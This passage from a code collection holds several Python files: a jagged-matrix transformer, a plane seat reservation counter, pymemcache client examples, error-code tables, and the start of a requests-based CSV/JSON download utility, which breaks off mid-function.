assert(self.row_length_max >= self.row_length_min)
self.rows_count_min = kw.get("rows-count-min", 4)
self.rows_count_max = kw.get("rows-count-max", 8)
assert(self.rows_count_max >= self.rows_count_min)
self.sequence = cls._sequence(kw.get("sequence", "ascii_uppercase"))
def __str__(self):
"""Pretty print plain rows with seat reservations
"""
assert self.matrix
s = [[str(e) for e in row] for row in self.matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = "\t".join("{{:{}}}".format(x) for x in lens)
table = [fmt.format(*row) for row in s]
return "\n" + "\n".join(table)
def generate(self):
self.matrix = [[random.choice(self.sequence)
for _ in range(random.randint(self.row_length_min, self.row_length_max))]
for _ in range(random.randint(self.rows_count_min, self.rows_count_max))]
return self.matrix
@staticmethod
def serialize(matrix):
assert matrix
return json.dumps(matrix)
@staticmethod
def deserialize(matrix_serialize):
assert matrix_serialize
return json.loads(matrix_serialize)
class MatrixTransformA(object):
"""Transform rows and columns based upon matching target character.
"""
@property
def verbose(self):
return self.__verbose
@verbose.setter
def verbose(self, value):
self.__verbose = value
@property
def case_insensitive(self):
# whether target matching ignores case
return self.__case_insensitive
@case_insensitive.setter
def case_insensitive(self, value):
self.__case_insensitive = value
@property
def matrix(self):
return self.__matrix
@matrix.setter
def matrix(self, value):
self.__matrix = value
@property
def matrix_transformed(self):
return self.__matrix_transformed
@matrix_transformed.setter
def matrix_transformed(self, value):
self.__matrix_transformed = value
@property
def target(self):
return self.__target
@target.setter
def target(self, value):
self.__target = value
@property
def logger(self):
return self.__logger
@logger.setter
def logger(self, value):
self.__logger = value
def _logger_config(self):
"""Logger config"""
self.logger = logging.getLogger("MatrixTransformation")
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO)
if self.verbose:
self.logger.setLevel(logging.DEBUG)
#
# Initialize
#
def __init__(self, kw):
"""Initialize
"""
self.verbose = kw.get("verbose", False)
matrix_serialized = kw.get("matrix", None)
self.matrix = JaggedMatrixGenerator.deserialize(matrix_serialized) if matrix_serialized else None
self.target = kw.get("target", None)
self.case_insensitive = kw.get("case-insensitive", False)
self._logger_config()
def match_target(self, value):
return str(self.target).lower() == str(value).lower() if self.case_insensitive else self.target == value
def transform(self):
numrows_max = len(self.matrix) # Number rows in matrix
numcols_max = len(self.matrix[0]) # Number columns in first row of matrix
rows = [False for i in range(numrows_max)]
columns = [False for i in range(numcols_max)]
for i_row, v_row in enumerate(self.matrix):
# print("row: {}: {}".format(i_row, v_row))
for i_column, v_column in enumerate(v_row):
# print("column: {}: {}".format(i_column, v_column))
numcols = len(v_row)
# print(f"{numcols_max}:{numcols}:{i_column}")
if numcols_max < numcols:
extend_numcols = numcols - numcols_max
numcols_max = numcols
extend_columns = [False for i in range(extend_numcols)]
columns.extend(extend_columns)
# print("extending: ", columns)
if self.match_target(v_column):
rows[i_row] = True
columns[i_column] = True
self.logger.info("rows: {0}: {1}".format(numrows_max, rows))
self.logger.info("columns: {0}: {1}".format(numcols_max, columns))
self.matrix_transformed = copy.copy(self.matrix)
# print(self.present_transformed)
for i_row, v_row in enumerate(self.matrix_transformed):
for i_column, v_column in enumerate(v_row):
# self.logger.info(
# "{}: {}: {}".format(i_row, len(rows), rows)
# )
assert i_row >= 0
assert i_row < len(rows)
# self.logger.info(
# "{}: {}: {}".format(i_column, len(columns), columns)
# )
assert i_column >= 0
assert i_column < len(columns)
if rows[i_row] or columns[i_column]:
self.matrix_transformed[i_row][i_column] = self.target
@property
def present_original(self):
matrix_str = "\n"
for i_row, v_row in enumerate(self.matrix):
matrix_str += "{} : {}\n".format(i_row, v_row)
self.logger.info("Original JaggedMatrixGenerator:\n{0}\n".format(matrix_str))
@property
def present_transformed(self):
matrix_str = "\n"
for i_row, v_row in enumerate(self.matrix_transformed):
matrix_str += "{} : {}\n".format(i_row, v_row)
self.logger.info("Transformed JaggedMatrixGenerator:\n{0}\n".format(matrix_str))
def main():
matrix = ""
target = ""
sequence = "ascii_uppercase"
case_insensitive = False
usage = ("""Usage: {0}
[-v | --verbose]
[-h | --help]
--matrix string
--target string
--case-insensitive
--sequence {1}
--matrix: Stringified 2-D jagged array; if not provided, a random one is generated.
--target: Character to target for the matrix transformation [Required]
--case-insensitive: Match the target character case-insensitively, Default: {2}
--sequence: Sequence used when a random matrix is generated, Default: '{3}'
""").format(sys.argv[0], JaggedMatrixGenerator.SEQUENCE, case_insensitive, sequence)
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hv",
["help", "verbose", "matrix=", "target=", "case-insensitive", "sequence="])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print(usage)
sys.exit(1)
kw = {}
for opt, val in opts:
if opt in ("-v", "--verbose"):
kw["verbose"] = True
elif opt in ("-h", "--help"):
print(usage)
sys.exit(0)
elif opt in ("--matrix"):
kw["matrix"] = str(val)
elif opt in ("--target"):
kw["target"] = str(val)
elif opt in ("--case-insensitive"):
kw["case-insensitive"] = True
elif opt in ("--sequence"):
kw["sequence"] = str(val)
if "target" not in kw:
print("%s: Provide --target" % sys.argv[0])
print(usage)
sys.exit(2)
if "case-insensitive" not in kw:
kw["case-insensitive"] = case_insensitive
if "sequence" not in kw:
kw["sequence"] = sequence
if "matrix" not in kw:
matrix = JaggedMatrixGenerator(kw)
matrix.generate()
kw["matrix"] = JaggedMatrixGenerator.serialize(matrix.matrix)
assert "matrix" in kw
assert "target" in kw
assert "case-insensitive" in kw
plane_reservations = MatrixTransformA(kw)
plane_reservations.present_original
plane_reservations.transform()
plane_reservations.present_transformed
if __name__ == "__main__":
main()
```
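A minimal programmatic sketch (bypassing the CLI parsing in `main`), with an illustrative hand-written matrix:
```python
kw = {
    "matrix": JaggedMatrixGenerator.serialize([["a", "B"], ["C", "A", "D"]]),
    "target": "A",
    "case-insensitive": True,
    "verbose": False,
}
transformer = MatrixTransformA(kw)
transformer.present_original      # logs the input matrix
transformer.transform()           # marks every row/column containing the target
transformer.present_transformed   # logs the transformed matrix
```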
|
{
"source": "jeff00seattle/plane-reservations",
"score": 4
}
|
#### File: jeff00seattle/plane-reservations/plane_reservations_A.py
```python
import sys
import getopt
import logging
class PlaneReservationsA(object):
"""Plane Reservations class
Brute force empty seats counting.
"""
_PLANE_ROW = [0, 0, 0, 2, 0, 0, 0, 0, 2, 0, 0, 0]
"""Plane Row unreserved.
0: Unreserved
1: Reserved
2: Aisle
"""
_ROW_SEAT_INDEX = {
'A': 0,
'B': 1,
'C': 2,
'D': 4,
'E': 5,
'F': 6,
'G': 7,
'H': 9,
'J': 10,
'K': 11,
}
"""Plane Seat index based only layout of _PLANE_ROW.
Key: Seating Letter
Value: Seat Index in Plane Row.
"""
@classmethod
def _generate_plane_seats(cls, N):
"""Generate all plane rows into a single list."""
return cls._PLANE_ROW * N
@staticmethod
def _row_index(res, number_of_rows):
"""Return seat index within Plane row"""
row_index = int(res[:-1]) - 1
assert row_index >= 0
assert row_index < number_of_rows
return row_index
@classmethod
def _row_seat_index(cls, res):
"""Return seat index within Plane row"""
seat = res[-1:]
assert isinstance(seat, str)
assert len(seat) == 1
row_seat_index = cls._ROW_SEAT_INDEX.get(seat, None)
assert row_seat_index is not None
return row_seat_index
@classmethod
def _parse_reservations_generator(cls, N, S):
"""Parse reservation string into a generator
of dictionary { "row": [Row Index], "seat": [Row Seat Index]}.
"""
return (
{
"row_index": cls._row_index(res, N),
"seat_index": cls._row_seat_index(res)
} for res in S.split(" ")
)
@classmethod
def _get_row_seat_offset(cls, res):
row_index = res.get("row_index", None)
assert row_index is not None
assert isinstance(row_index, int)
assert row_index >= 0
row_seat_index = res.get("seat_index", None)
assert row_seat_index is not None
assert isinstance(row_seat_index, int)
assert row_seat_index >= 0
row_seat_offset = (row_index * len(cls._PLANE_ROW)) + row_seat_index
assert row_seat_offset >= 0
return row_seat_offset
@classmethod
def _reserve_seats(cls, N, S):
"""Reserve Plane's Seats using expected number of rows and map which seats should be reserved."""
unreserved_seats = cls._generate_plane_seats(N)
reserved_seats = unreserved_seats[:]
if len(S) > 0:
for res in cls._parse_reservations_generator(N, S):
row_seat_offset = cls._get_row_seat_offset(res)
assert row_seat_offset < len(reserved_seats)
reserved_seats[row_seat_offset] = 1
return reserved_seats
@classmethod
def _find_max_number_of_grouping(cls, reserved_seats, k):
"""Find the max number of grouping of seats adjacent of length k
amoung currently reserved seats.
"""
# print(reserved_seats)
n = len(reserved_seats)
count_groups = 0
count_empty_contigous_seats = 0
i = 0
while i < n:
if reserved_seats[i] != 0:
# print('continue', i)
count_empty_contigous_seats = 0
i += 1
continue
count_empty_contigous_seats += 1
# print('empty', i, count_empty_contigous_seats)
if count_empty_contigous_seats >= k:
count_groups += 1
# print('found', i, count_groups)
if ((i + 1) % len(cls._PLANE_ROW)) == 0:
# print('new row', i)
count_empty_contigous_seats = 0
i += 1
return count_groups
@classmethod
def _pretty_print_plane_seats(cls, seats):
"""Split list of planes seats by rows.
"""
seats = ["-" if x == 2 else x for x in seats]
row_length = len(cls._PLANE_ROW)
return [seats[i:i + row_length] for i in range(0, len(seats), row_length)]
@staticmethod
def _pretty_print_2d_array(rows):
"""Pretty print plain rows with seat reservations
"""
s = [[str(e) for e in row] for row in rows]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = "\t".join("{{:{}}}".format(x) for x in lens)
table = [fmt.format(*row) for row in s]
return "\n" + "\n".join(table)
@property
def number_rows(self):
return self.__number_rows
@number_rows.setter
def number_rows(self, value):
self.__number_rows = value
@property
def verbose(self):
return self.__verbose
@verbose.setter
def verbose(self, value):
self.__verbose = value
@property
def reservations(self):
return self.__reservations
@reservations.setter
def reservations(self, value):
self.__reservations = value
@property
def grouping(self):
return self.__grouping
@grouping.setter
def grouping(self, value):
self.__grouping = value
@property
def logger(self):
return self.__logger
@logger.setter
def logger(self, value):
self.__logger = value
def _logger_config(self):
"""Logger config"""
self.logger = logging.getLogger("Plane Reservation")
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO)
if self.verbose:
self.logger.setLevel(logging.DEBUG)
#
# Initialize
#
def __init__(self, kw):
"""Initialize
"""
self.number_rows = kw.get("number-rows")
self.reservations = kw.get("reservations", "")
self.grouping = kw.get("grouping", "")
self.verbose = kw.get("verbose", False)
self._logger_config()
def reserve_seats(self):
"""Reserve Seats"""
cls = self.__class__
self.reserved_seats = cls._reserve_seats(self.number_rows, self.reservations)
self.logger.info("Plane Rows Reserved: {0}".format(
cls._pretty_print_2d_array(
cls._pretty_print_plane_seats(self.reserved_seats)
)
)
)
def max_grouping(self):
"""Group"""
cls = self.__class__
max_grouping_count = cls._find_max_number_of_grouping(self.reserved_seats , self.grouping)
self.logger.info("Seat Grouping By {0}: Max Number = {1}".format(self.grouping, max_grouping_count))
def main():
reservations = ""
grouping = 1
usage = ("""Usage: {0}
[-v | --verbose]
[-h | --help]
--number-rows int
--reservations string
--grouping number int
--number-rows: Number of Rows [Required]
--reservations: Seat reservations, example '1F 2A 1G 2E 3D 3F', default '{1}'
--grouping: Seat grouping, default '{2}'
""").format(sys.argv[0], reservations, grouping)
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hv",
["help", "verbose", "number-rows=", "reservations=", "grouping="])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print(usage)
sys.exit(1)
kw = {}
for opt, val in opts:
if opt in ("-v", "--verbose"):
kw["verbose"] = True
elif opt in ("-h", "--help"):
print(usage)
sys.exit(0)
elif opt in ("--number-rows"):
kw["number-rows"] = int(val)
elif opt in ("--reservations"):
kw["reservations"] = str(val)
elif opt in ("--grouping"):
kw["grouping"] = int(val)
if "number-rows" not in kw:
print("%s: Provide --number-rows" % sys.argv[0])
print(usage)
sys.exit(2)
elif "number-rows" in kw and kw["number-rows"] <= 0:
print("%s: Provide valid --number-rows" % sys.argv[0])
print(usage)
sys.exit(2)
if "reservations" not in kw:
kw["reservations"] = reservations
elif "reservations" in kw and len(kw["reservations"]) == 0:
print("%s: Provide valid --reservations" % sys.argv[0])
print(usage)
sys.exit(2)
if "grouping" not in kw:
kw["grouping"] = grouping
elif "grouping" in kw and kw["grouping"] <= 0:
print("%s: Provide valid --grouping" % sys.argv[0])
print(usage)
sys.exit(2)
assert "number-rows" in kw
assert "reservations" in kw
assert "grouping" in kw
assert kw["number-rows"] > 0
plane_reservations = PlaneReservationsA(kw)
plane_reservations.reserve_seats()
plane_reservations.max_grouping()
if __name__ == "__main__":
main()
```
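A minimal programmatic sketch (bypassing the CLI parsing in `main`): two rows, three reserved seats, then count the groups of three adjacent free seats:
```python
kw = {
    "number-rows": 2,
    "reservations": "1A 2F 1C",
    "grouping": 3,
    "verbose": False,
}
plane = PlaneReservationsA(kw)
plane.reserve_seats()   # logs the seat map with the three reservations applied
plane.max_grouping()    # logs the number of 3-seat groupings still available
```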
|
{
"source": "jeff00seattle/pyfortified-cache",
"score": 3
}
|
#### File: pyfortified-cache/examples/example_pymemcache_client.py
```python
import os
import sys
from pprintpp import pprint
import socket
from pymemcache_client import (
PymemcacheClient
)
host = socket.gethostbyname("localhost")
def example_pymemcache_client_none():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pymemcache_client = PymemcacheClient(config=None)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_basic():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
config = {
"servers": [{"host": "localhost", "port": 11211}],
"client_type": "basic"
}
pymemcache_client = PymemcacheClient(config=config)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_hash():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
config = {
"servers": [{"host": "localhost", "port": 11211}],
"client_type": "hash"
}
pymemcache_client = PymemcacheClient(config=config)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def example_pymemcache_client_file():
function_name = sys._getframe().f_code.co_name
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
pprint(function_name)
pprint("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
full_path = os.path.realpath(__file__)
path = os.path.dirname(full_path)
config_file = "{}/resources/example_pymemcache.json".format(path)
pymemcache_client = PymemcacheClient(config_file=config_file)
pprint("Pymemcache Config: {0}".format(dict(pymemcache_client.config)))
pprint("Pymemcache Servers: {0}".format(pymemcache_client.memcached_servers))
pprint("CacheClient Client: {0}".format(vars(pymemcache_client.cache_client)))
pprint("CacheClient Client Type: {0}".format(type(pymemcache_client.cache_client)))
try:
pymemcache_client.cache_client.set('some_key', 'some_value')
except ConnectionRefusedError as ex:
print("ConnectionRefusedError: {0}".format(ex))
except Exception as ex:
print("Exception: {0}".format(ex))
result = pymemcache_client.cache_client.get('some_key')
pprint(result)
def main():
example_pymemcache_client_none()
example_pymemcache_client_basic()
example_pymemcache_client_hash()
example_pymemcache_client_file()
if __name__ == '__main__':
sys.exit(main())
```
#### File: pyfortified-cache/pyfortified_cache/cache_types.py
```python
class CacheTypes(object):
"""Cache Types ENUM
"""
UNDEFINED = None
MEMCACHED_CACHE = 'Memcached'
@staticmethod
def validate(cache_type):
return cache_type in [
CacheTypes.MEMCACHED_CACHE,
]
```
|
{
"source": "jeff00seattle/requests-fortified",
"score": 2
}
|
#### File: pyfortified_requests/errors/error_desc.py
```python
from pyhttpstatus_utils import HTTP_STATUS_DESC_DICT
from pyhttpstatus_utils import HTTP_STATUS_PHRASE_DICT
REQUESTS_FORTIFIED_ERROR_NAME_DICT = {
-1: 'Unassigned',
0: 'Success',
600: 'Module Error',
601: 'Argument Error',
602: 'Request Error',
603: 'Software Error',
604: 'Unexpected Value',
605: 'Request HTTP',
606: 'Request Connect',
607: 'Request Redirect',
608: 'Retry Exhausted',
609: 'Unexpected content-type returned',
610: 'Upload Data Error',
611: 'Auth Error',
612: 'Auth JSON Error',
613: 'Auth Response Error',
614: 'JSON Decoding Error',
699: 'Unexpected Error'
}
REQUESTS_FORTIFIED_ERROR_DESC_DICT = {
-1: 'Unassigned exit condition',
0: 'Successfully completed',
600: 'Error occurred somewhere within module',
601: 'Invalid or missing argument provided',
602: 'Unexpected request failure',
603: 'Unexpected software error was detected',
604: 'Unexpected value returned',
605: 'Request HTTP error occurred',
606: 'Request Connection error occurred',
607: 'Request Redirect',
608: 'Retry Exhausted',
609: 'Unexpected content-type returned',
610: 'Upload Data Error',
611: 'Auth Error',
612: 'Auth JSON Error',
613: 'Auth Response Error',
614: 'JSON Decoding Error',
699: 'Unexpected Error'
}
def error_name(error_code, return_bool=False):
"""Provide definition of Error Code
Args:
error_code:
Returns:
"""
if error_code is None or not isinstance(error_code, int):
return "Error Code: Invalid Type: %d" % error_code
exit_code_name_ = HTTP_STATUS_PHRASE_DICT.get(error_code, None)
if exit_code_name_ is not None:
return exit_code_name_
exit_code_name_ = REQUESTS_FORTIFIED_ERROR_NAME_DICT.get(error_code, None)
if exit_code_name_ is not None:
return exit_code_name_
return False if return_bool else "Error Code: Undefined: %d" % error_code
def error_desc(error_code, return_bool=False):
"""Provide definition of Error Code
Args:
error_code:
Returns:
"""
if error_code is None or not isinstance(error_code, int):
return "Error Code: Invalid Type: %d" % error_code
exit_code_description_ = HTTP_STATUS_DESC_DICT.get(error_code, None)
if exit_code_description_ is not None:
return exit_code_description_
exit_code_description_ = REQUESTS_FORTIFIED_ERROR_DESC_DICT.get(error_code, None)
if exit_code_description_ is not None:
return exit_code_description_
return False if return_bool else "Error Code: Undefined: %d" % error_code
```
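A quick usage sketch of the lookup helpers above:
```python
print(error_name(602))                     # Request Error
print(error_desc(608))                     # Retry Exhausted
print(error_name(200))                     # falls back to the HTTP phrase (e.g. "OK")
print(error_name(999, return_bool=True))   # False for unknown codes
```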
#### File: requests-fortified/pyfortified_requests/pyfortified_requests_download.py
```python
import logging
import csv
import datetime as dt
import gzip
import http.client as http_client
import io
import ujson as json
import os
import re
import time
import requests
from pyfortified_logging import (LoggingFormat, LoggingOutput)
from pprintpp import pprint
from pyfortified_requests import (__python_required_version__)
from pyfortified_requests.errors import (get_exception_message, RequestsFortifiedErrorCodes)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedModuleError,
)
from pyfortified_requests.support import (
base_class_name,
bytes_to_human,
csv_skip_last_row,
detect_bom,
env_usage,
handle_json_decode_error,
python_check_version,
remove_bom,
validate_response,
)
from pyfortified_requests.support.curl import command_line_request_curl
from .pyfortified_requests import (RequestsFortified)
from safe_cast import safe_dict
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
class RequestsFortifiedDownload(object):
__requests_client = None
def __init__(
self,
logger_level=logging.INFO,
logger_format=LoggingFormat.JSON,
logger_output=LoggingOutput.STDOUT_COLOR,
requests_client=None,
):
self.requests_client = RequestsFortified(
logger_format=logger_format,
logger_level=logger_level,
logger_output=logger_output,
requests_client=requests_client
)
@property
def logger(self):
return self.requests_client.logger
@property
def session(self):
return self.requests_client.session
@property
def requests_session_client(self):
return self.requests_client.requests_session_client
@property
def requests_client(self):
return self.__requests_client
@requests_client.setter
def requests_client(self, value):
self.__requests_client = value
def request(self, **kwargs):
return self.requests_client.request(**kwargs)
@property
def built_request_curl(self):
return self.requests_client.built_request_curl
def request_csv_download(
self,
request_method,
request_url,
tmp_csv_file_name,
tmp_directory,
request_params=None,
request_data=None,
request_retry=None,
request_retry_func=None,
request_retry_excps=None,
request_retry_http_status_codes=None,
request_retry_excps_func=None,
request_headers=None,
request_auth=None,
request_label=None,
build_request_curl=True,
allow_redirects=True,
verify=True,
skip_first_row=False,
skip_last_row=False,
read_first_row=False,
csv_delimiter=',',
csv_header=None,
encoding_write=None,
encoding_read=None,
decode_unicode=False,
):
"""Download and Read CSV file.
Args:
request_method: request_method for the new :class:`Request` object.
request_url: URL for the new :class:`Request` object.
tmp_csv_file_name: Provide temporary name for downloaded CSV
tmp_directory: Provide temporary directory to hold downloaded CSV
request_params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
request_data: (optional) Dictionary, bytes, or file-like object to
send in the body of the :class:`Request`.
request_retry: (optional) Retry configuration.
request_headers: (optional) Dictionary of HTTP Headers to
send with the :class:`Request`.
request_auth: (optional) Auth tuple to enable
Basic/Digest/Custom HTTP Auth.
allow_redirects: (optional) Boolean. Set to True if
POST/PUT/DELETE redirect following is allowed.
verify: (optional) whether the SSL cert will be verified. A
CA_BUNDLE path can also be provided. Defaults to ``True``.
skip_first_row: (optional) Skip first row if it does not contain
column headers.
skip_last_row: (optional) Skip first row if it does not contain
column values.
read_first_row: (optional) Read first row separate from data returned.
csv_delimiter: (optional) Delimiter character, default comma ','.
csv_header:
encoding_write:
encoding_read:
decode_unicode:
Returns:
Generator containing CSV data by rows in JSON dictionary format.
"""
_request_label = 'Request Download CSV File'
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.debug(
"{0}: Start".format(request_label),
extra={
'request_url': request_url,
'encoding_write': encoding_write,
'encoding_read': encoding_read,
}
)
timer_start = dt.datetime.now()
_attempts = 0
_tries = 60
_delay = 10
while _tries:
_attempts += 1
log.info(
"{0}: Attempt: {1}".format(request_label, _attempts),
extra={
'request_url': request_url,
}
)
response = self.requests_client.request(
request_method=request_method,
request_url=request_url,
request_params=request_params,
request_data=request_data,
request_retry=request_retry,
request_retry_func=request_retry_func,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=request_retry_excps_func,
request_headers=request_headers,
request_auth=request_auth,
build_request_curl=build_request_curl,
allow_redirects=allow_redirects,
verify=verify,
stream=True,
request_label=request_label
)
if response is None:
log.error(
"{0}: No response".format(request_label),
extra={
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: No response".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_REQUEST,
)
http_status_code = response.status_code
timer_end = dt.datetime.now()
timer_delta = timer_end - timer_start
response_time_secs = timer_delta.seconds
response_headers = None
if hasattr(response, 'headers'):
response_headers = \
json.loads(
json.dumps(
dict(response.headers)
)
)
log.debug(
"{0}: Response Status".format(request_label),
extra={
'http_status_code': http_status_code,
'response_time_secs': response_time_secs,
'response_url': response.url,
'response_headers': safe_dict(response_headers),
}
)
(tmp_csv_file_path, tmp_csv_file_size) = self.download_csv(
response,
tmp_directory,
tmp_csv_file_name,
request_label=request_label,
encoding_write=encoding_write,
decode_unicode=decode_unicode
)
if tmp_csv_file_path is not None:
break
_tries -= 1
if not _tries:
log.error(
"{0}: Exhausted Retries".format(request_label),
extra={
'tries': _tries,
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Exhausted Retries".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_RETRY_EXHAUSTED
)
log.info(
"{0}: Performing Retry".format(request_label),
extra={
'tries': _tries,
'delay': _delay,
'request_url': request_url,
}
)
time.sleep(_delay)
log.info(
"{0}: Finished".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'file_size': bytes_to_human(tmp_csv_file_size),
'encoding_read': encoding_read,
}
)
log.debug(
"{0}: Usage".format(request_label),
extra=env_usage(tmp_directory),
)
with open(file=tmp_csv_file_path, mode='r', encoding=encoding_read) as csv_file_r:
if read_first_row:
csv_report_name = csv_file_r.readline()
csv_report_name = re.sub('\"', '', csv_report_name)
csv_report_name = re.sub('\n', '', csv_report_name)
log.info(
"{0}: Report".format(request_label),
extra={'csv_report_name': csv_report_name},
)
elif skip_first_row:
next(csv_file_r)
csv_file_header = next(csv_file_r)
csv_header_actual = \
[h.strip() for h in csv_file_header.split(csv_delimiter)]
csv_header_hr = []
index = 0
for column_name in csv_header_actual:
csv_header_hr.append({'index': index, 'name': column_name})
index += 1
log.debug(
"{0}: Content Header".format(request_label),
extra={'csv_header': csv_header_hr},
)
csv_fieldnames = csv_header if csv_header else csv_header_actual
csv_dict_reader = csv.DictReader(csv_file_r, fieldnames=csv_fieldnames, delimiter=csv_delimiter)
if skip_last_row:
for row in csv_skip_last_row(csv_dict_reader):
yield row
else:
for row in csv_dict_reader:
yield row
def request_json_download(
self,
request_method,
request_url,
tmp_json_file_name,
tmp_directory,
request_params=None,
request_data=None,
request_retry=None,
request_retry_func=None,
request_retry_excps=None,
request_retry_excps_func=None,
request_headers=None,
request_auth=None,
request_label=None,
build_request_curl=False,
allow_redirects=True,
verify=True,
encoding_write=None,
encoding_read=None,
):
"""Download and Read JSON file.
Args:
request_method: request_method for the new :class:`Request` object.
request_url: URL for the new :class:`Request` object.
tmp_json_file_name: Provide temporary name for downloaded CSV
tmp_directory: Provide temporary directory to hold downloaded CSV
request_params: (optional) Dictionary or bytes to be sent in the query
string for the :class:`Request`.
request_data: (optional) Dictionary, bytes, or file-like object to
send in the body of the :class:`Request`.
request_retry: (optional) Retry configuration.
request_headers: (optional) Dictionary of HTTP Headers to
send with the :class:`Request`.
request_auth: (optional) Auth tuple to enable
Basic/Digest/Custom HTTP Auth.
build_request_curl: (optional) Build a copy-n-paste curl for command line
that provides same request as this call.
allow_redirects: (optional) Boolean. Set to True if
POST/PUT/DELETE redirect following is allowed.
verify: (optional) whether the SSL cert will be verified. A
CA_BUNDLE path can also be provided. Defaults to ``True``.
            encoding_write: (optional) Encoding used when writing the downloaded file.
            encoding_read: (optional) Encoding used when reading the downloaded file back.
        Returns:
            Parsed JSON content of the downloaded file.
"""
_request_label = "Request Download JSON File"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={
'request_url': request_url,
'encoding_write': encoding_write,
'encoding_read': encoding_read,
}
)
timer_start = dt.datetime.now()
_attempts = 0
_tries = 60
_delay = 10
while _tries:
_attempts += 1
log.debug(
"{0}: Download".format(request_label),
extra={
'attempts': _attempts,
'request_url': request_url,
}
)
response = self.requests_client.request(
request_method=request_method,
request_url=request_url,
request_params=request_params,
request_data=request_data,
request_retry=request_retry,
request_retry_func=request_retry_func,
request_retry_excps=request_retry_excps,
request_retry_excps_func=request_retry_excps_func,
request_headers=request_headers,
request_auth=request_auth,
build_request_curl=build_request_curl,
allow_redirects=allow_redirects,
verify=verify,
stream=True,
request_label=request_label
)
if response is None:
log.error(
"{0}: No response".format(request_label),
extra={
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: No response".format(request_label),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_REQUEST
)
http_status_code = response.status_code
timer_end = dt.datetime.now()
timer_delta = timer_end - timer_start
response_time_secs = timer_delta.seconds
response_headers = None
if hasattr(response, 'headers'):
response_headers = \
json.loads(
json.dumps(
dict(response.headers)
)
)
log.debug(
"{0}: Response Status".format(request_label),
extra={
'http_status_code': http_status_code,
'response_time_secs': response_time_secs,
'response_url': response.url,
'response_headers': safe_dict(response_headers),
}
)
if not os.path.exists(tmp_directory):
os.mkdir(tmp_directory)
tmp_json_file_path = "{0}/{1}".format(tmp_directory, tmp_json_file_name)
if os.path.exists(tmp_json_file_path):
log.debug(
"{0}: Removing".format(request_label),
extra={'file_path': tmp_json_file_path},
)
os.remove(tmp_json_file_path)
mode_write = 'wb' if encoding_write is None else 'w'
log.debug(
"{0}: Finished".format(request_label),
extra={
'file_path': tmp_json_file_path,
'mode_write': mode_write,
'encoding_write': encoding_write,
}
)
log.debug(
"{0}: Usage".format(request_label),
extra=env_usage(tmp_directory)
)
chunk_total_sum = 0
with open(file=tmp_json_file_path, mode=mode_write, encoding=encoding_write) as json_raw_file_w:
log.debug(
"{0}: Response Raw: Started".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
_tries -= 1
error_exception = None
error_details = None
chunk_size = 8192
try:
